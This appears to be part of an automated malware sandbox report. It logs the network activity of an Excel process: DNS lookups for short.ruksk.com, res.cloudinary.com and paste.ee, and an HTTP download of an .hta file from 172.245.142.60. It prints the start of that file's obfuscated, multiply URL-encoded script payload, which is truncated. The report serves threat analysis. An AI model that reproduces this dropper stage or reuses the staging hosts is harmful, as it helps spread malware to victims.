                                                                                            Dec 10, 2024 06:58:32.916821003 CET49174443192.168.2.22151.101.1.137
                                                                                            Dec 10, 2024 06:58:32.916840076 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:32.916851997 CET49174443192.168.2.22151.101.1.137
                                                                                            Dec 10, 2024 06:58:32.916893959 CET49174443192.168.2.22151.101.1.137
                                                                                            Dec 10, 2024 06:58:32.923116922 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:32.923125029 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:32.923157930 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:32.923172951 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:32.923182011 CET49174443192.168.2.22151.101.1.137
                                                                                            Dec 10, 2024 06:58:32.923199892 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:32.923208952 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:32.923209906 CET49174443192.168.2.22151.101.1.137
                                                                                            Dec 10, 2024 06:58:32.923218966 CET49174443192.168.2.22151.101.1.137
                                                                                            Dec 10, 2024 06:58:32.923233032 CET49174443192.168.2.22151.101.1.137
                                                                                            Dec 10, 2024 06:58:32.923245907 CET49174443192.168.2.22151.101.1.137
                                                                                            Dec 10, 2024 06:58:32.930066109 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:32.930073977 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:32.930105925 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:32.930125952 CET49174443192.168.2.22151.101.1.137
                                                                                            Dec 10, 2024 06:58:32.930133104 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:32.930144072 CET49174443192.168.2.22151.101.1.137
                                                                                            Dec 10, 2024 06:58:32.937568903 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:32.937592983 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:32.937624931 CET49174443192.168.2.22151.101.1.137
                                                                                            Dec 10, 2024 06:58:32.937633038 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:32.937642097 CET49174443192.168.2.22151.101.1.137
                                                                                            Dec 10, 2024 06:58:32.944242954 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:32.944261074 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:32.944299936 CET49174443192.168.2.22151.101.1.137
                                                                                            Dec 10, 2024 06:58:32.944307089 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:32.944317102 CET49174443192.168.2.22151.101.1.137
                                                                                            Dec 10, 2024 06:58:32.951112986 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:32.951136112 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:32.951173067 CET49174443192.168.2.22151.101.1.137
                                                                                            Dec 10, 2024 06:58:32.951179028 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:32.951189041 CET49174443192.168.2.22151.101.1.137
                                                                                            Dec 10, 2024 06:58:32.958628893 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:32.958647013 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:32.958699942 CET49174443192.168.2.22151.101.1.137
                                                                                            Dec 10, 2024 06:58:32.958708048 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:32.958744049 CET49174443192.168.2.22151.101.1.137
                                                                                            Dec 10, 2024 06:58:32.966290951 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:32.966314077 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:32.966346979 CET49174443192.168.2.22151.101.1.137
                                                                                            Dec 10, 2024 06:58:32.966351986 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:32.966362000 CET49174443192.168.2.22151.101.1.137
                                                                                            Dec 10, 2024 06:58:32.966379881 CET49174443192.168.2.22151.101.1.137
                                                                                            Dec 10, 2024 06:58:33.108324051 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:33.108350039 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:33.108392954 CET49174443192.168.2.22151.101.1.137
                                                                                            Dec 10, 2024 06:58:33.108407021 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:33.108416080 CET49174443192.168.2.22151.101.1.137
                                                                                            Dec 10, 2024 06:58:33.108423948 CET49174443192.168.2.22151.101.1.137
                                                                                            Dec 10, 2024 06:58:33.115039110 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:33.115046978 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:33.115070105 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:33.115077019 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:33.115080118 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:33.115096092 CET49174443192.168.2.22151.101.1.137
                                                                                            Dec 10, 2024 06:58:33.115102053 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:33.115118980 CET49174443192.168.2.22151.101.1.137
                                                                                            Dec 10, 2024 06:58:33.115124941 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:33.115135908 CET49174443192.168.2.22151.101.1.137
                                                                                            Dec 10, 2024 06:58:33.122623920 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:33.122631073 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:33.122643948 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:33.122653961 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:33.122678995 CET49174443192.168.2.22151.101.1.137
                                                                                            Dec 10, 2024 06:58:33.122685909 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:33.122694969 CET49174443192.168.2.22151.101.1.137
                                                                                            Dec 10, 2024 06:58:33.129134893 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:33.129168034 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:33.129178047 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:33.129188061 CET49174443192.168.2.22151.101.1.137
                                                                                            Dec 10, 2024 06:58:33.129198074 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:33.129208088 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:33.129220963 CET49174443192.168.2.22151.101.1.137
                                                                                            Dec 10, 2024 06:58:33.129241943 CET49174443192.168.2.22151.101.1.137
                                                                                            Dec 10, 2024 06:58:33.136468887 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:33.136487961 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:33.136526108 CET49174443192.168.2.22151.101.1.137
                                                                                            Dec 10, 2024 06:58:33.136533976 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:33.136543036 CET49174443192.168.2.22151.101.1.137
                                                                                            Dec 10, 2024 06:58:33.137515068 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:33.137562990 CET49174443192.168.2.22151.101.1.137
                                                                                            Dec 10, 2024 06:58:33.137568951 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:33.137578964 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:33.137620926 CET49174443192.168.2.22151.101.1.137
                                                                                            Dec 10, 2024 06:58:33.138019085 CET49174443192.168.2.22151.101.1.137

                                                                                            UDP Packets

                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                            Dec 10, 2024 06:57:41.772686958 CET5456253192.168.2.228.8.8.8
                                                                                            Dec 10, 2024 06:57:41.907732964 CET53545628.8.8.8192.168.2.22
                                                                                            Dec 10, 2024 06:57:45.956525087 CET5291753192.168.2.228.8.8.8
                                                                                            Dec 10, 2024 06:57:46.175134897 CET53529178.8.8.8192.168.2.22
                                                                                            Dec 10, 2024 06:57:46.208971024 CET5291753192.168.2.228.8.8.8
                                                                                            Dec 10, 2024 06:57:46.342581987 CET53529178.8.8.8192.168.2.22
                                                                                            Dec 10, 2024 06:57:46.342982054 CET5291753192.168.2.228.8.8.8
                                                                                            Dec 10, 2024 06:57:46.476732969 CET53529178.8.8.8192.168.2.22
                                                                                            Dec 10, 2024 06:57:46.477063894 CET5291753192.168.2.228.8.8.8
                                                                                            Dec 10, 2024 06:57:46.610750914 CET53529178.8.8.8192.168.2.22
                                                                                            Dec 10, 2024 06:58:04.919166088 CET6275153192.168.2.228.8.8.8
                                                                                            Dec 10, 2024 06:58:05.276091099 CET5789353192.168.2.228.8.8.8
                                                                                            Dec 10, 2024 06:58:05.423610926 CET53578938.8.8.8192.168.2.22
                                                                                            Dec 10, 2024 06:58:08.431745052 CET5482153192.168.2.228.8.8.8
                                                                                            Dec 10, 2024 06:58:08.699264050 CET53548218.8.8.8192.168.2.22
                                                                                            Dec 10, 2024 06:58:08.699527979 CET5482153192.168.2.228.8.8.8
                                                                                            Dec 10, 2024 06:58:09.040522099 CET53548218.8.8.8192.168.2.22
                                                                                            Dec 10, 2024 06:58:09.041049004 CET5482153192.168.2.228.8.8.8
                                                                                            Dec 10, 2024 06:58:09.174835920 CET53548218.8.8.8192.168.2.22
                                                                                            Dec 10, 2024 06:58:09.175596952 CET5482153192.168.2.228.8.8.8
                                                                                            Dec 10, 2024 06:58:09.309245110 CET53548218.8.8.8192.168.2.22
                                                                                            Dec 10, 2024 06:58:27.088314056 CET5471953192.168.2.228.8.8.8
                                                                                            Dec 10, 2024 06:58:27.234561920 CET53547198.8.8.8192.168.2.22
                                                                                            Dec 10, 2024 06:58:27.506633043 CET4988153192.168.2.228.8.8.8
                                                                                            Dec 10, 2024 06:58:27.640626907 CET53498818.8.8.8192.168.2.22
                                                                                            Dec 10, 2024 06:58:28.255542040 CET5499853192.168.2.228.8.8.8
                                                                                            Dec 10, 2024 06:58:28.493438005 CET53549988.8.8.8192.168.2.22
                                                                                            Dec 10, 2024 06:58:28.493628025 CET5499853192.168.2.228.8.8.8
                                                                                            Dec 10, 2024 06:58:28.627326965 CET53549988.8.8.8192.168.2.22
                                                                                            Dec 10, 2024 06:58:28.627490997 CET5499853192.168.2.228.8.8.8
                                                                                            Dec 10, 2024 06:58:28.761075974 CET53549988.8.8.8192.168.2.22
                                                                                            Dec 10, 2024 06:58:28.761231899 CET5499853192.168.2.228.8.8.8
                                                                                            Dec 10, 2024 06:58:28.998879910 CET53549988.8.8.8192.168.2.22
                                                                                            Dec 10, 2024 06:58:28.999042034 CET5499853192.168.2.228.8.8.8
                                                                                            Dec 10, 2024 06:58:29.133102894 CET53549988.8.8.8192.168.2.22
                                                                                            Dec 10, 2024 06:58:46.072819948 CET5278153192.168.2.228.8.8.8
                                                                                            Dec 10, 2024 06:58:46.206413984 CET53527818.8.8.8192.168.2.22
                                                                                            Dec 10, 2024 06:58:46.206574917 CET5278153192.168.2.228.8.8.8
                                                                                            Dec 10, 2024 06:58:46.340930939 CET53527818.8.8.8192.168.2.22
                                                                                            Dec 10, 2024 06:58:46.341187954 CET5278153192.168.2.228.8.8.8
                                                                                            Dec 10, 2024 06:58:46.474672079 CET53527818.8.8.8192.168.2.22
                                                                                            Dec 10, 2024 06:58:46.474889040 CET5278153192.168.2.228.8.8.8
                                                                                            Dec 10, 2024 06:58:46.608483076 CET53527818.8.8.8192.168.2.22
                                                                                            Dec 10, 2024 06:58:46.608628035 CET5278153192.168.2.228.8.8.8
                                                                                            Dec 10, 2024 06:58:46.742235899 CET53527818.8.8.8192.168.2.22

                                                                                            DNS Queries

                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                            Dec 10, 2024 06:57:41.772686958 CET192.168.2.228.8.8.80x5491Standard query (0)short.ruksk.comA (IP address)IN (0x0001)false
                                                                                            Dec 10, 2024 06:57:45.956525087 CET192.168.2.228.8.8.80x64a5Standard query (0)short.ruksk.comA (IP address)IN (0x0001)false
                                                                                            Dec 10, 2024 06:57:46.208971024 CET192.168.2.228.8.8.80x64a5Standard query (0)short.ruksk.comA (IP address)IN (0x0001)false
                                                                                            Dec 10, 2024 06:57:46.342982054 CET192.168.2.228.8.8.80x64a5Standard query (0)short.ruksk.comA (IP address)IN (0x0001)false
                                                                                            Dec 10, 2024 06:57:46.477063894 CET192.168.2.228.8.8.80x64a5Standard query (0)short.ruksk.comA (IP address)IN (0x0001)false
                                                                                            Dec 10, 2024 06:58:04.919166088 CET192.168.2.228.8.8.80x973fStandard query (0)res.cloudinary.comA (IP address)IN (0x0001)false
                                                                                            Dec 10, 2024 06:58:05.276091099 CET192.168.2.228.8.8.80x82fbStandard query (0)res.cloudinary.comA (IP address)IN (0x0001)false
                                                                                            Dec 10, 2024 06:58:08.431745052 CET192.168.2.228.8.8.80xea46Standard query (0)short.ruksk.comA (IP address)IN (0x0001)false
                                                                                            Dec 10, 2024 06:58:08.699527979 CET192.168.2.228.8.8.80xea46Standard query (0)short.ruksk.comA (IP address)IN (0x0001)false
                                                                                            Dec 10, 2024 06:58:09.041049004 CET192.168.2.228.8.8.80xea46Standard query (0)short.ruksk.comA (IP address)IN (0x0001)false
                                                                                            Dec 10, 2024 06:58:09.175596952 CET192.168.2.228.8.8.80xea46Standard query (0)short.ruksk.comA (IP address)IN (0x0001)false
                                                                                            Dec 10, 2024 06:58:27.088314056 CET192.168.2.228.8.8.80x159cStandard query (0)res.cloudinary.comA (IP address)IN (0x0001)false
                                                                                            Dec 10, 2024 06:58:27.506633043 CET192.168.2.228.8.8.80xdd08Standard query (0)res.cloudinary.comA (IP address)IN (0x0001)false
                                                                                            Dec 10, 2024 06:58:28.255542040 CET192.168.2.228.8.8.80x323bStandard query (0)paste.eeA (IP address)IN (0x0001)false
                                                                                            Dec 10, 2024 06:58:28.493628025 CET192.168.2.228.8.8.80x323bStandard query (0)paste.eeA (IP address)IN (0x0001)false
                                                                                            Dec 10, 2024 06:58:28.627490997 CET192.168.2.228.8.8.80x323bStandard query (0)paste.eeA (IP address)IN (0x0001)false
                                                                                            Dec 10, 2024 06:58:28.761231899 CET192.168.2.228.8.8.80x323bStandard query (0)paste.eeA (IP address)IN (0x0001)false
                                                                                            Dec 10, 2024 06:58:28.999042034 CET192.168.2.228.8.8.80x323bStandard query (0)paste.eeA (IP address)IN (0x0001)false
                                                                                            Dec 10, 2024 06:58:46.072819948 CET192.168.2.228.8.8.80xa1cdStandard query (0)paste.eeA (IP address)IN (0x0001)false
                                                                                            Dec 10, 2024 06:58:46.206574917 CET192.168.2.228.8.8.80xa1cdStandard query (0)paste.eeA (IP address)IN (0x0001)false
                                                                                            Dec 10, 2024 06:58:46.341187954 CET192.168.2.228.8.8.80xa1cdStandard query (0)paste.eeA (IP address)IN (0x0001)false
                                                                                            Dec 10, 2024 06:58:46.474889040 CET192.168.2.228.8.8.80xa1cdStandard query (0)paste.eeA (IP address)IN (0x0001)false
                                                                                            Dec 10, 2024 06:58:46.608628035 CET192.168.2.228.8.8.80xa1cdStandard query (0)paste.eeA (IP address)IN (0x0001)false

                                                                                            DNS Answers

                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                            Dec 10, 2024 06:57:41.907732964 CET8.8.8.8192.168.2.220x5491No error (0)short.ruksk.com54.150.207.131A (IP address)IN (0x0001)false
                                                                                            Dec 10, 2024 06:57:46.175134897 CET8.8.8.8192.168.2.220x64a5No error (0)short.ruksk.com54.150.207.131A (IP address)IN (0x0001)false
                                                                                            Dec 10, 2024 06:57:46.342581987 CET8.8.8.8192.168.2.220x64a5No error (0)short.ruksk.com54.150.207.131A (IP address)IN (0x0001)false
                                                                                            Dec 10, 2024 06:57:46.476732969 CET8.8.8.8192.168.2.220x64a5No error (0)short.ruksk.com54.150.207.131A (IP address)IN (0x0001)false
                                                                                            Dec 10, 2024 06:57:46.610750914 CET8.8.8.8192.168.2.220x64a5No error (0)short.ruksk.com54.150.207.131A (IP address)IN (0x0001)false
                                                                                            Dec 10, 2024 06:58:05.270452976 CET8.8.8.8192.168.2.220x973fNo error (0)res.cloudinary.comresc.cloudinary.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                            Dec 10, 2024 06:58:05.423610926 CET8.8.8.8192.168.2.220x82fbNo error (0)res.cloudinary.comcloudinary.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                            Dec 10, 2024 06:58:05.423610926 CET8.8.8.8192.168.2.220x82fbNo error (0)cloudinary.map.fastly.net151.101.65.137A (IP address)IN (0x0001)false
                                                                                            Dec 10, 2024 06:58:05.423610926 CET8.8.8.8192.168.2.220x82fbNo error (0)cloudinary.map.fastly.net151.101.129.137A (IP address)IN (0x0001)false
                                                                                            Dec 10, 2024 06:58:05.423610926 CET8.8.8.8192.168.2.220x82fbNo error (0)cloudinary.map.fastly.net151.101.1.137A (IP address)IN (0x0001)false
                                                                                            Dec 10, 2024 06:58:05.423610926 CET8.8.8.8192.168.2.220x82fbNo error (0)cloudinary.map.fastly.net151.101.193.137A (IP address)IN (0x0001)false
                                                                                            Dec 10, 2024 06:58:08.699264050 CET8.8.8.8192.168.2.220xea46No error (0)short.ruksk.com54.150.207.131A (IP address)IN (0x0001)false
                                                                                            Dec 10, 2024 06:58:09.040522099 CET8.8.8.8192.168.2.220xea46No error (0)short.ruksk.com54.150.207.131A (IP address)IN (0x0001)false
                                                                                            Dec 10, 2024 06:58:09.174835920 CET8.8.8.8192.168.2.220xea46No error (0)short.ruksk.com54.150.207.131A (IP address)IN (0x0001)false
                                                                                            Dec 10, 2024 06:58:09.309245110 CET8.8.8.8192.168.2.220xea46No error (0)short.ruksk.com54.150.207.131A (IP address)IN (0x0001)false
                                                                                            Dec 10, 2024 06:58:27.234561920 CET8.8.8.8192.168.2.220x159cNo error (0)res.cloudinary.comcloudinary.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                            Dec 10, 2024 06:58:27.234561920 CET8.8.8.8192.168.2.220x159cNo error (0)cloudinary.map.fastly.net151.101.1.137A (IP address)IN (0x0001)false
                                                                                            Dec 10, 2024 06:58:27.234561920 CET8.8.8.8192.168.2.220x159cNo error (0)cloudinary.map.fastly.net151.101.129.137A (IP address)IN (0x0001)false
                                                                                            Dec 10, 2024 06:58:27.234561920 CET8.8.8.8192.168.2.220x159cNo error (0)cloudinary.map.fastly.net151.101.65.137A (IP address)IN (0x0001)false
                                                                                            Dec 10, 2024 06:58:27.234561920 CET8.8.8.8192.168.2.220x159cNo error (0)cloudinary.map.fastly.net151.101.193.137A (IP address)IN (0x0001)false
                                                                                            Dec 10, 2024 06:58:27.640626907 CET8.8.8.8192.168.2.220xdd08No error (0)res.cloudinary.comcloudinary.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                            Dec 10, 2024 06:58:27.640626907 CET8.8.8.8192.168.2.220xdd08No error (0)cloudinary.map.fastly.net151.101.65.137A (IP address)IN (0x0001)false
                                                                                            Dec 10, 2024 06:58:27.640626907 CET8.8.8.8192.168.2.220xdd08No error (0)cloudinary.map.fastly.net151.101.193.137A (IP address)IN (0x0001)false
                                                                                            Dec 10, 2024 06:58:27.640626907 CET8.8.8.8192.168.2.220xdd08No error (0)cloudinary.map.fastly.net151.101.129.137A (IP address)IN (0x0001)false
                                                                                            Dec 10, 2024 06:58:27.640626907 CET8.8.8.8192.168.2.220xdd08No error (0)cloudinary.map.fastly.net151.101.1.137A (IP address)IN (0x0001)false
                                                                                            Dec 10, 2024 06:58:28.493438005 CET8.8.8.8192.168.2.220x323bNo error (0)paste.ee188.114.96.6A (IP address)IN (0x0001)false
                                                                                            Dec 10, 2024 06:58:28.493438005 CET8.8.8.8192.168.2.220x323bNo error (0)paste.ee188.114.97.6A (IP address)IN (0x0001)false
                                                                                            Dec 10, 2024 06:58:28.627326965 CET8.8.8.8192.168.2.220x323bNo error (0)paste.ee188.114.96.6A (IP address)IN (0x0001)false
                                                                                            Dec 10, 2024 06:58:28.627326965 CET8.8.8.8192.168.2.220x323bNo error (0)paste.ee188.114.97.6A (IP address)IN (0x0001)false
                                                                                            Dec 10, 2024 06:58:28.761075974 CET8.8.8.8192.168.2.220x323bNo error (0)paste.ee188.114.97.6A (IP address)IN (0x0001)false
                                                                                            Dec 10, 2024 06:58:28.761075974 CET8.8.8.8192.168.2.220x323bNo error (0)paste.ee188.114.96.6A (IP address)IN (0x0001)false
                                                                                            Dec 10, 2024 06:58:28.998879910 CET8.8.8.8192.168.2.220x323bNo error (0)paste.ee188.114.97.6A (IP address)IN (0x0001)false
                                                                                            Dec 10, 2024 06:58:28.998879910 CET8.8.8.8192.168.2.220x323bNo error (0)paste.ee188.114.96.6A (IP address)IN (0x0001)false
                                                                                            Dec 10, 2024 06:58:29.133102894 CET8.8.8.8192.168.2.220x323bNo error (0)paste.ee188.114.97.6A (IP address)IN (0x0001)false
                                                                                            Dec 10, 2024 06:58:29.133102894 CET8.8.8.8192.168.2.220x323bNo error (0)paste.ee188.114.96.6A (IP address)IN (0x0001)false
                                                                                            Dec 10, 2024 06:58:46.206413984 CET8.8.8.8192.168.2.220xa1cdNo error (0)paste.ee188.114.97.6A (IP address)IN (0x0001)false
                                                                                            Dec 10, 2024 06:58:46.206413984 CET8.8.8.8192.168.2.220xa1cdNo error (0)paste.ee188.114.96.6A (IP address)IN (0x0001)false
                                                                                            Dec 10, 2024 06:58:46.340930939 CET8.8.8.8192.168.2.220xa1cdNo error (0)paste.ee188.114.96.6A (IP address)IN (0x0001)false
                                                                                            Dec 10, 2024 06:58:46.340930939 CET8.8.8.8192.168.2.220xa1cdNo error (0)paste.ee188.114.97.6A (IP address)IN (0x0001)false
                                                                                            Dec 10, 2024 06:58:46.474672079 CET8.8.8.8192.168.2.220xa1cdNo error (0)paste.ee188.114.96.6A (IP address)IN (0x0001)false
                                                                                            Dec 10, 2024 06:58:46.474672079 CET8.8.8.8192.168.2.220xa1cdNo error (0)paste.ee188.114.97.6A (IP address)IN (0x0001)false
                                                                                            Dec 10, 2024 06:58:46.608483076 CET8.8.8.8192.168.2.220xa1cdNo error (0)paste.ee188.114.97.6A (IP address)IN (0x0001)false
                                                                                            Dec 10, 2024 06:58:46.608483076 CET8.8.8.8192.168.2.220xa1cdNo error (0)paste.ee188.114.96.6A (IP address)IN (0x0001)false
                                                                                            Dec 10, 2024 06:58:46.742235899 CET8.8.8.8192.168.2.220xa1cdNo error (0)paste.ee188.114.96.6A (IP address)IN (0x0001)false
                                                                                            Dec 10, 2024 06:58:46.742235899 CET8.8.8.8192.168.2.220xa1cdNo error (0)paste.ee188.114.97.6A (IP address)IN (0x0001)false

                                                                                            HTTP Request Dependency Graph

                                                                                            • short.ruksk.com
                                                                                            • res.cloudinary.com
                                                                                            • 172.245.142.60

                                                                                            HTTP Packets

                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            0192.168.2.2249164172.245.142.60803312C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Dec 10, 2024 06:57:44.376657963 CET402OUTGET /466/wcc/matchingwithbestthingstobegreatforentirelifegivenmebestthignsevergive.hta HTTP/1.1
                                                                                            Accept: */*
                                                                                            UA-CPU: AMD64
                                                                                            Accept-Encoding: gzip, deflate
                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                            Host: 172.245.142.60
                                                                                            Connection: Keep-Alive
                                                                                            Dec 10, 2024 06:57:45.530473948 CET1236INHTTP/1.1 200 OK
                                                                                            Date: Tue, 10 Dec 2024 05:57:45 GMT
                                                                                            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25
                                                                                            Last-Modified: Mon, 09 Dec 2024 08:34:12 GMT
                                                                                            ETag: "304ff-628d23aa8f80d"
                                                                                            Accept-Ranges: bytes
                                                                                            Content-Length: 197887
                                                                                            Keep-Alive: timeout=5, max=100
                                                                                            Connection: Keep-Alive
                                                                                            Content-Type: application/hta
                                                                                            Data Raw: 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 4a 61 76 61 53 63 72 69 70 74 3e 6d 3d 27 25 33 43 73 63 72 69 70 74 25 32 30 6c 61 6e 67 75 61 67 65 25 33 44 4a 61 76 61 53 63 72 69 70 74 25 33 45 6d 25 33 44 25 32 37 25 32 35 33 43 53 63 72 69 70 74 25 32 35 32 30 4c 61 6e 67 75 61 67 65 25 32 35 33 44 25 32 35 32 37 4a 61 76 61 73 63 72 69 70 74 25 32 35 32 37 25 32 35 33 45 25 32 35 30 41 25 32 35 33 43 25 32 35 32 31 2d 2d 25 32 35 32 30 48 54 4d 4c 25 32 35 32 30 45 6e 63 72 79 70 74 69 6f 6e 25 32 35 32 30 70 72 6f 76 69 64 65 64 25 32 35 32 30 62 79 25 32 35 32 30 74 75 66 61 74 2e 63 6f 6d 25 32 35 32 30 2d 2d 25 32 35 33 45 25 32 35 30 41 25 32 35 33 43 25 32 35 32 31 2d 2d 25 32 35 30 41 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 25 32 35 32 38 75 6e 65 73 63 61 70 65 25 32 35 32 38 25 32 35 32 37 25 32 35 32 35 33 43 25 32 35 32 35 32 31 25 32 35 32 35 34 34 25 32 35 32 35 34 46 25 32 35 32 35 34 33 25 32 35 32 35 35 34 25 32 35 32 35 35 39 25 32 35 32 35 35 30 25 32 35 32 35 34 35 25 [TRUNCATED]
                                                                                            Data Ascii: <script language=JavaScript>m='%3Cscript%20language%3DJavaScript%3Em%3D%27%253CScript%2520Language%253D%2527Javascript%2527%253E%250A%253C%2521--%2520HTML%2520Encryption%2520provided%2520by%2520tufat.com%2520--%253E%250A%253C%2521--%250Adocument.write%2528unescape%2528%2527%25253C%252521%252544%25254F%252543%252554%252559%252550%252545%252520%252568%252574%25256D%25256C%25253E%25250A%25253C%25256D%252565%252574%252561%252520%252568%252574%252574%252570%25252D%252565%252571%252575%252569%252576%25253D%252522%252558%25252D%252555%252541%25252D%252543%25256F%25256D%252570%252561%252574%252569%252562%25256C%252565%252522%252520%252563%25256F%25256E%252574%252565%25256E%252574%25253D%252522%252549%252545%25253D%252545%25256D%252575%25256C%252561%252574%252565%252549%252545%252538%252522%252520%25253E%25250A%25253C%252568%252574%25256D%25256C%25253E%25250A%25253C%252562%25256F%252564%252579%25253E%25250A%2525
                                                                                            Dec 10, 2024 06:57:45.530720949 CET224INData Raw: 33 43 25 32 35 32 35 35 33 25 32 35 32 35 36 33 25 32 35 32 35 35 32 25 32 35 32 35 34 39 25 32 35 32 35 35 30 25 32 35 32 35 37 34 25 32 35 32 35 32 30 25 32 35 32 35 37 34 25 32 35 32 35 35 39 25 32 35 32 35 37 30 25 32 35 32 35 36 35 25 32 35
                                                                                            Data Ascii: 3C%252553%252563%252552%252549%252550%252574%252520%252574%252559%252570%252565%25253D%252522%252554%252545%252578%252574%25252F%252576%252562%252573%252563%252572%252569%252570%252554%252522%25253E%25250A%252564%252549%2525
                                                                                            Dec 10, 2024 06:57:45.530735016 CET1236INData Raw: 34 44 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35
                                                                                            Data Ascii: 4D%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%25
                                                                                            Dec 10, 2024 06:57:45.530744076 CET224INData Raw: 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30
                                                                                            Data Ascii: 52520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%2
                                                                                            Dec 10, 2024 06:57:45.530755997 CET1236INData Raw: 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30
